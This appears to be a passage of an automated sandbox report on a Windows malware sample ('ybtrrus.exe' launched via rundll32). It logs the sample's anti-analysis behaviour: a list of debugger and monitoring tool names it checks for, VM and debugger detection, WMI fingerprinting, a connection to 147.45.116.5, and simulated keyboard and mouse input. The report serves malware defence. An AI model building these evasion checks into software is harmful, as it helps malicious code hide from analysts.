Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\iDQiPwFWUp\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery
Source: C:\pnVcakKiqh\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PROCMON.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: ybtrrus.exe Binary or memory string: JOEBOXSERVER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: AUTORUNSC.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: OLLYDBG.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: X64DBG.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: REGMON.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: WINDBG.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: AUTORUNS.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: IMPORTREC.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PETOOLS.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: FIDDLER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PROC_ANALYZER.EXE
Source: ybtrrus.exe Binary or memory string: JOEBOXCONTROL.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: SYSANALYZER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: IDAQ.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: DUMPCAP.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: WIRESHARK.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: FILEMON.EXE
Source: C:\iDQiPwFWUp\ybtrrus.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 5.6 %
Source: C:\iDQiPwFWUp\ybtrrus.exe API coverage: 5.5 %
Source: C:\iDQiPwFWUp\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\pnVcakKiqh\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C831F00 CloseHandle,memset,FindFirstFileW,FindClose, 12_2_6C831F00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8316F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError, 12_2_6C8316F0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE4C2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError, 28_2_6FE4C2D0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_0545FB74 FindFirstFileW,FindClose, 28_2_0545FB74
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_0545F590 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 28_2_0545F590
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05467CC6 FindFirstFileW, 28_2_05467CC6
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05467DCE GetLogicalDriveStringsW, 28_2_05467DCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C81EE1C GetSystemInfo,CreateFileMappingW,MapViewOfFile,VirtualAlloc,VirtualFree,UnmapViewOfFile,CloseHandle,CloseHandle, 12_2_6C81EE1C
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5080fa819e61b36dbd2b7e7e74bdf5c819fed0_7522e4b5_75dffb69-1a82-4980-a5db-ce9131bf24b7\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_17fea6c8-cf23-47b2-9980-606d9795cdc0\
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}J
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P@
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOy6B
Source: rundll32.exe, 0000000C.00000003.1660572027.000000000311E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1660600474.000000000311F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1879646428.0000000003120000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1879973902.0000000003120000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1907789649.0000000003120000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: rundll32.exe, 00000013.00000003.1712424926.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1712264584.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1962392544.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1705368888.000000000305F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1933713755.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1705289741.000000000305E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0101a.zip.12.dr Binary or memory string: x3HgFs
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: 4HGFs
Source: C:\iDQiPwFWUp\ybtrrus.exe API call chain: ExitProcess graph end node
Source: C:\iDQiPwFWUp\ybtrrus.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\iDQiPwFWUp\ybtrrus.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C85599F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6C85599F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6927E0 DllMain,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_6C6927E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C85BA00 GetProcessHeap,HeapAlloc, 12_2_6C85BA00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C85599F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6C85599F
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE59D73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_6FE59D73
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE613E1 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 28_2_6FE613E1
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE5F0D4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_6FE5F0D4
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 147.45.116.5 80
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05D5F500 ShellExecuteW, 28_2_05D5F500
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05468F7E keybd_event, 28_2_05468F7E
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05468F86 mouse_event, 28_2_05468F86
